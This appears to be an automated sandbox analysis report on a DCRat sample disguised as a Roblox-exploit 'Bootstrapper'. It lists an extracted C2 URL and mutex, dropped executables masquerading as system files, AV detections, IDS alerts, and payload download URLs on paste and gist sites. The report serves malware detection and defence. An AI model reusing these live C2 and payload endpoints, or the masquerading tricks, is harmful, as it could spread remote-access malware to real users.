Malware Configuration Extractor: DCRat {"C2 url": "http://072486cm.n9shteam.ru/PhppollbigloadservermultiSqlBasetrackCdnUploads", "MUTEX": "DCR_MUTEX-pSeVGVkt0bF1Du5Q58H8", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Multi AV Scanner detection for domain / URL

Source: 4d38a1ec.solaraweb-alj.pages.dev	Virustotal: Detection: 7%	Perma Link
Source: https://4d38a1ec.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe	Virustotal: Detection: 7%	Perma Link
Source: http://4d38a1ec.solaraweb-alj.pages.dev	Virustotal: Detection: 7%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\wmnXYZRZEK.exe	ReversingLabs: Detection: 52%
Source: C:\Program Files (x86)\Windows Defender\en-GB\RuntimeBroker.exe	ReversingLabs: Detection: 52%
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\SIHClient.exe	ReversingLabs: Detection: 52%
Source: C:\ProgramData\WindowsHolographicDevices\SpatialStore\wmnXYZRZEK.exe	ReversingLabs: Detection: 52%
Source: C:\Recovery\wmnXYZRZEK.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	ReversingLabs: Detection: 60%
Source: C:\Users\user\Desktop\Bootstrapper.exe	ReversingLabs: Detection: 63%
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	ReversingLabs: Detection: 28%
Source: C:\Users\user\Desktop\ufQLssLX.log	ReversingLabs: Detection: 23%
Source: C:\monitordll\componentreviewsavesSession.exe	ReversingLabs: Detection: 52%

Multi AV Scanner detection for submitted file

Source: KKjubdmzCR.exe	ReversingLabs: Detection: 81%
Source: KKjubdmzCR.exe	Virustotal: Detection: 66%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\wmnXYZRZEK.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Joe Sandbox ML: detected
Source: C:\Windows\System32\SecurityHealthSystray.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Defender\en-GB\RuntimeBroker.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\wmnXYZRZEK.exe	Joe Sandbox ML: detected
Source: C:\monitordll\componentreviewsavesSession.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\SIHClient.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\wmnXYZRZEK.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: KKjubdmzCR.exe

Joe Sandbox ML: detected

Source: KKjubdmzCR.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.44.59:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 128.116.123.3:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.23.46:443 -> 192.168.2.4:49737 version: TLS 1.2

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: KKjubdmzCR.exe, KKjubdmzCR.exe, 00000000.00000002.1824505943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Bootstrapper.exe, 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmp, Bootstrapper.exe, 00000003.00000003.1817467071.00000000071B4000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000003.00000003.1816251543.00000000068AD000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000003.00000000.1813269853.0000000000E33000.00000002.00000001.01000000.00000007.sdmp, Bootstrapper.exe0.0.dr
Source:	Binary string: System.Runtime.Serialization.ni.pdb source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Core.pdbP source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Data.pdb source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Xml.ni.pdb source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Runtime.Serialization.ni.pdbRSDSg@h source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.ni.pdbRSDS source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000348000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.ni.pdb source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Drawing.ni.pdb source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Data.ni.pdb source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Data.ni.pdbRSDSC source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Configuration.pdb source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: \??\C:\Windows\System.pdb source: BootstrapperV1.23.exe, 00000008.00000002.2156401668.000001907D6A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Xml.pdb source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.pdb source: BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000348000.00000004.00000800.00020000.00000000.sdmp, WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Core.ni.pdb source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Numerics.ni.pdbRSDSautg source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Data.pdbH source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Numerics.ni.pdb source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Windows.Forms.pdb source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Xml.pdbH source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: mscorlib.pdb source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Drawing.pdb/ source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Drawing.pdb source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\giumm02q\giumm02q.pdb source: componentreviewsavesSession.exe, 00000016.00000002.2128695870.0000000002CD9000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Core.pdb source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Runtime.Serialization.pdb source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: namem.pdb\ source: BootstrapperV1.23.exe, 00000008.00000002.2156401668.000001907D6B8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Numerics.pdb` source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Configuration.pdbP source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Numerics.pdb source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.ni.pdb source: WER8DFC.tmp.dmp.17.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER8DFC.tmp.dmp.17.dr

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

System file written: C:\Windows\System32\SecurityHealthSystray.exe

Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Code function: 3_2_00E0A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,		3_2_00E0A69B
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Code function: 3_2_00E1C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,		3_2_00E1C220

Source: C:\Users\user\Desktop\KKjubdmzCR.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	File opened: C:\Users\user\AppData	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49751 -> 104.21.77.97:80

Source: global traffic	HTTP traffic detected: GET /asset/discord.json HTTP/1.1Host: getsolara.devConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api/endpoint.json HTTP/1.1Host: getsolara.dev
Source: global traffic	HTTP traffic detected: GET /download/static/files/Bootstrapper.exe HTTP/1.1Host: 4d38a1ec.solaraweb-alj.pages.devConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /asset/discord.json HTTP/1.1Host: getsolara.devConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api/endpoint.json HTTP/1.1Host: getsolara.dev
Source: global traffic	HTTP traffic detected: GET /v2/client-version/WindowsPlayer/channel/live HTTP/1.1Host: clientsettings.roblox.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /dist/v18.16.0/node-v18.16.0-x64.msi HTTP/1.1Host: www.nodejs.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 128.116.123.3 128.116.123.3
Source: Joe Sandbox View	IP Address: 104.21.93.27 104.21.93.27
Source: Joe Sandbox View	IP Address: 172.66.44.59 172.66.44.59
Source: Joe Sandbox View	IP Address: 104.20.23.46 104.20.23.46

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49732 -> 104.21.93.27:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49735 -> 104.21.93.27:443
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49738
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49817

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /asset/discord.json HTTP/1.1Host: getsolara.devConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api/endpoint.json HTTP/1.1Host: getsolara.dev
Source: global traffic	HTTP traffic detected: GET /download/static/files/Bootstrapper.exe HTTP/1.1Host: 4d38a1ec.solaraweb-alj.pages.devConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /asset/discord.json HTTP/1.1Host: getsolara.devConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api/endpoint.json HTTP/1.1Host: getsolara.dev
Source: global traffic	HTTP traffic detected: GET /v2/client-version/WindowsPlayer/channel/live HTTP/1.1Host: clientsettings.roblox.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /dist/v18.16.0/node-v18.16.0-x64.msi HTTP/1.1Host: www.nodejs.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: getsolara.dev
Source: global traffic	DNS traffic detected: DNS query: 4d38a1ec.solaraweb-alj.pages.dev
Source: global traffic	DNS traffic detected: DNS query: clientsettings.roblox.com
Source: global traffic	DNS traffic detected: DNS query: www.nodejs.org
Source: global traffic	DNS traffic detected: DNS query: nodejs.org

Source: Bootstrapper.exe, 00000001.00000002.1903748427.000001638938E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:6463
Source: KKjubdmzCR.exe, Bootstrapper.exe, 00000001.00000002.1903748427.0000016389291000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000001.00000002.1903748427.000001638938E000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:6463/rpc?v=1
Source: Bootstrapper.exe, 00000001.00000002.1903748427.000001638938E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:64632R
Source: Bootstrapper.exe, 00000001.00000002.1903748427.000001638942E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://4d38a1ec.solaraweb-alj.pages.dev
Source: BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000196000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://clientsettings.roblox.com
Source: BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000196000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edge-term4-fra2.roblox.com
Source: Bootstrapper.exe, 00000001.00000002.1903748427.0000016389345000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000008.00000002.2151604236.00000190000B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://getsolara.dev
Source: BootstrapperV1.23.exe.1.dr	String found in binary or memory: http://james.newtonking.com/projects/json
Source: BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000196000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nodejs.org
Source: Bootstrapper.exe, 00000001.00000002.1903748427.0000016389327000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000097000.00000004.00000800.00020000.00000000.sdmp, componentreviewsavesSession.exe, 00000016.00000002.2128695870.0000000002CD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.17.dr	String found in binary or memory: http://upx.sf.net
Source: BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000196000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.nodejs.org
Source: Bootstrapper.exe, 00000001.00000002.1903748427.000001638942E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://4d38a1ec.solaraweb-alj.pages.dev
Source: BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000196000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000174000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://4d38a1ec.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe
Source: BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000196000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000008.00000002.2151604236.00000190000D1000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000174000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://4d38a1ec.solaraweb-alj.pages.dev/download/static/files/Solara.Dir.zip
Source: KKjubdmzCR.exe, KKjubdmzCR.exe, 00000000.00000002.1824505943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Bootstrapper.exe, 00000001.00000000.1808692010.00000163873D2000.00000002.00000001.01000000.00000005.sdmp, BootstrapperV1.23.exe, 00000008.00000000.1902477921.000001907B9B7000.00000002.00000001.01000000.0000000C.sdmp, BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000196000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe.0.dr, BootstrapperV1.23.exe.1.dr	String found in binary or memory: https://aka.ms/vs/17/release/vc_redist.x64.exe
Source: BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000196000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clientsettings.roblox.com
Source: BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000196000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000174000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/live
Source: KKjubdmzCR.exe, Bootstrapper.exe, 00000001.00000002.1903748427.0000016389291000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discord.com
Source: KKjubdmzCR.exe, 00000000.00000002.1824505943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Bootstrapper.exe, 00000001.00000000.1808692010.00000163873D2000.00000002.00000001.01000000.00000005.sdmp, BootstrapperV1.23.exe, 00000008.00000000.1902477921.000001907B9B7000.00000002.00000001.01000000.0000000C.sdmp, Bootstrapper.exe.0.dr, BootstrapperV1.23.exe.1.dr	String found in binary or memory: https://discord.com;http://127.0.0.1:6463/rpc?v=11
Source: Bootstrapper.exe, 00000001.00000002.1903748427.0000016389327000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000001.00000002.1903748427.00000163893A8000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000001.00000002.1903748427.000001638933A000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000008.00000002.2151604236.00000190000AA000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000097000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000008.00000002.2151604236.00000190000FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getsolara.dev
Source: KKjubdmzCR.exe, KKjubdmzCR.exe, 00000000.00000002.1824505943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Bootstrapper.exe, 00000001.00000002.1903748427.00000163893A8000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000001.00000000.1808692010.00000163873D2000.00000002.00000001.01000000.00000005.sdmp, BootstrapperV1.23.exe, 00000008.00000000.1902477921.000001907B9B7000.00000002.00000001.01000000.0000000C.sdmp, BootstrapperV1.23.exe, 00000008.00000002.2151604236.00000190000FE000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe.0.dr, BootstrapperV1.23.exe.1.dr	String found in binary or memory: https://getsolara.dev/api/endpoint.json
Source: KKjubdmzCR.exe, KKjubdmzCR.exe, 00000000.00000002.1824505943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Bootstrapper.exe, 00000001.00000002.1903748427.00000163892A3000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000001.00000002.1903748427.0000016389291000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000001.00000000.1808692010.00000163873D2000.00000002.00000001.01000000.00000005.sdmp, BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000013000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000008.00000000.1902477921.000001907B9B7000.00000002.00000001.01000000.0000000C.sdmp, BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000001000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe.0.dr, BootstrapperV1.23.exe.1.dr	String found in binary or memory: https://getsolara.dev/asset/discord.json
Source: KKjubdmzCR.exe, Bootstrapper.exe, 00000001.00000002.1903748427.00000163893A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gist.githubusercontent.com/typeshi12/072784a0d3a602ed441a435d04c943b6/raw
Source: KKjubdmzCR.exe, 00000000.00000002.1824505943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Bootstrapper.exe, 00000001.00000000.1808692010.00000163873D2000.00000002.00000001.01000000.00000005.sdmp, Bootstrapper.exe.0.dr	String found in binary or memory: https://gist.githubusercontent.com/typeshi12/072784a0d3a602ed441a435d04c943b6/rawChttps://pastebin.c
Source: KKjubdmzCR.exe, KKjubdmzCR.exe, 00000000.00000002.1824505943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Bootstrapper.exe, 00000001.00000002.1903748427.0000016389291000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000001.00000000.1808692010.00000163873D2000.00000002.00000001.01000000.00000005.sdmp, Bootstrapper.exe.0.dr	String found in binary or memory: https://gist.githubusercontent.com/typeshi12/29ef3a44a19235b08aaf229631c024d8/raw
Source: BootstrapperV1.23.exe, 00000008.00000000.1902477921.000001907B9B7000.00000002.00000001.01000000.0000000C.sdmp, BootstrapperV1.23.exe, 00000008.00000002.2151604236.00000190000FE000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe.1.dr	String found in binary or memory: https://gitlab.com/cmd-softworks1/a/-/snippets/4768754/raw/main/endpoint.json
Source: BootstrapperV1.23.exe, 00000008.00000000.1902477921.000001907B9B7000.00000002.00000001.01000000.0000000C.sdmp, BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000001000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe.1.dr	String found in binary or memory: https://gitlab.com/cmd-softworks1/a/-/snippets/4768756/raw/main/discord.json
Source: BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000119000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000196000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000170000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ncs.roblox.com/upload
Source: BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000196000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nodejs.org
Source: BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000119000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000196000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000008.00000002.2151604236.000001900016C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
Source: KKjubdmzCR.exe, Bootstrapper.exe, 00000001.00000002.1903748427.00000163893A8000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000008.00000000.1902477921.000001907B9B7000.00000002.00000001.01000000.0000000C.sdmp, BootstrapperV1.23.exe, 00000008.00000002.2151604236.00000190000FE000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe.1.dr	String found in binary or memory: https://pastebin.com/raw/pjseRvyK
Source: BootstrapperV1.23.exe.1.dr	String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000196000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.nodejs.org
Source: KKjubdmzCR.exe, KKjubdmzCR.exe, 00000000.00000002.1824505943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Bootstrapper.exe, 00000001.00000000.1808692010.00000163873D2000.00000002.00000001.01000000.00000005.sdmp, BootstrapperV1.23.exe, 00000008.00000000.1902477921.000001907B9B7000.00000002.00000001.01000000.0000000C.sdmp, BootstrapperV1.23.exe, 00000008.00000002.2151604236.0000019000196000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe.0.dr, BootstrapperV1.23.exe.1.dr	String found in binary or memory: https://www.nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
Source: KKjubdmzCR.exe, KKjubdmzCR.exe, 00000000.00000002.1824505943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Bootstrapper.exe, 00000001.00000000.1808692010.00000163873D2000.00000002.00000001.01000000.00000005.sdmp, BootstrapperV1.23.exe, 00000008.00000000.1902477921.000001907B9B7000.00000002.00000001.01000000.0000000C.sdmp, Bootstrapper.exe.0.dr, BootstrapperV1.23.exe.1.dr	String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Source: unknown	HTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.44.59:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 128.116.123.3:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.23.46:443 -> 192.168.2.4:49737 version: TLS 1.2

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe

Code function: 3_2_00E06FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

3_2_00E06FAA

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\CSC7999042AC4784EED922BD982607A7FA2.TMP
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\SecurityHealthSystray.exe

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File deleted: C:\Windows\System32\CSC7999042AC4784EED922BD982607A7FA2.TMP

Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 1_2_00007FFD9B6298F8	1_2_00007FFD9B6298F8
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 1_2_00007FFD9B622540	1_2_00007FFD9B622540
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 1_2_00007FFD9B614928	1_2_00007FFD9B614928
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Code function: 3_2_00E0848E	3_2_00E0848E
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Code function: 3_2_00E040FE	3_2_00E040FE
